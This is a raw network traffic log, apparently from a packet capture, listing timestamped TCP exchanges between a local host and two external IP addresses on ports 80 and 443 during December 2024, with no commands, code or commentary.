                                                                                                                                                                                              Dec 16, 2024 01:01:22.906493902 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:22.908015013 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.908073902 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:22.908179045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.908232927 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:22.909292936 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.909327984 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.909349918 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:22.909384966 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:22.910657883 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.910734892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:22.911184072 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.911231995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:22.912094116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.912142992 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:22.912516117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.912561893 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:22.913485050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.913532019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:22.928236008 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.928247929 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.928384066 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:22.928457975 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.928751945 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:22.933868885 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.933881044 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.933943987 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:22.933955908 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.933998108 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:22.984597921 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.984611034 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.984781981 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:22.984797955 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.984848976 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:22.989337921 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.989355087 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.989423037 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:22.989442110 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.989514112 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:22.994975090 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.994987965 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.995054007 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:22.995063066 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.995105982 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:22.999910116 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.999922991 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:22.999996901 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.000013113 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.000052929 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.005373955 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.005388021 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.005443096 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.005459070 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.005497932 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.039081097 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.039153099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.039261103 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.039340019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.039398909 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.039448977 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.040236950 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.040299892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.040482044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.040535927 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.041611910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.041692019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.041750908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.041793108 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.041800022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.041840076 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.042845011 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.042906046 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.042987108 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.043044090 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.043975115 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.044044018 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.044200897 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.044272900 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.045124054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.045180082 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.045794964 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.045875072 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.046324015 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.046380997 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.046438932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.046489000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.047492981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.047548056 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.047552109 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.047597885 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.048657894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.048712015 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.048717976 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.048759937 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.049865961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.049927950 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.050267935 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.050324917 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.050988913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.051049948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.051095009 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.051142931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.052167892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.052222013 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.052361012 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.052416086 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.053376913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.053432941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.053459883 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.053519011 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.054495096 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.054552078 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.054960966 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.055018902 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.055687904 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.055752039 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.055825949 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.055876970 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.056849957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.056915045 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.057121992 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.057176113 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.058038950 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.058092117 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.058167934 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.058219910 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.059190035 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.059257030 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.059519053 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.059567928 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.060368061 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.060430050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.061580896 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.061618090 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.061640978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.061655045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.061671972 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.061719894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.062705040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.062767029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.062858105 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.062911987 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.063899040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.063955069 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.065083027 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.065118074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.065141916 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.065155029 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.065175056 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.065208912 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.066248894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.066283941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.066309929 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.066342115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.067439079 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.067475080 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.067493916 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.067527056 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.068571091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.068625927 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.068702936 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.068764925 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.069713116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.069771051 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.070944071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.070979118 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.071007967 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.071016073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.071029902 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.071069956 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.072062969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.072123051 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.072189093 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.072252035 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.073272943 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.073360920 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.073448896 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.073504925 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.074449062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.074482918 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.074498892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.074527979 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.075683117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.075721979 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.075742960 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.075772047 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.076757908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.076822996 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.077276945 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.077346087 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.077919006 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.077984095 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.078449965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.078514099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.079103947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.079174995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.079541922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.079598904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.080275059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.080332041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.081497908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.081535101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.081557989 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.081569910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.081595898 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.081619978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.082654953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.082715034 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.083230972 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.083287954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.083885908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.083920956 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.083942890 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.083971977 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.084964991 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.085027933 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.085573912 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.085633039 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.086133957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.086189032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.087359905 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.087394953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.087420940 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.087450981 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.087477922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.087534904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.088470936 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.088530064 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.088788033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.088844061 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.089646101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.089704990 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.090854883 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.090895891 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.090913057 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.090951920 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.090962887 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.091017008 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.092006922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.092067003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.092133999 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.092190981 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.093142033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.093200922 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.093288898 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.093364000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.093530893 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.093548059 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.093616009 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.093658924 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.093703032 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.094329119 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.094367981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.094388962 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.094419003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.095482111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.095540047 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.095568895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.095626116 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.096673012 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.096729994 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.097897053 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.097930908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.097955942 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.097968102 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.097976923 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.098025084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.099004030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.099062920 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.099813938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.099869967 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.100090027 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.100173950 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.196526051 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.196542978 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.196741104 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.196811914 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.196881056 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.202189922 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.202202082 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.202260017 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.202279091 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.202322960 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.219299078 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.219317913 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.219429016 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.219429016 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.219496012 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.219554901 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.228385925 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.228396893 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.228460073 CET49776443192.168.2.4154.216.20.243
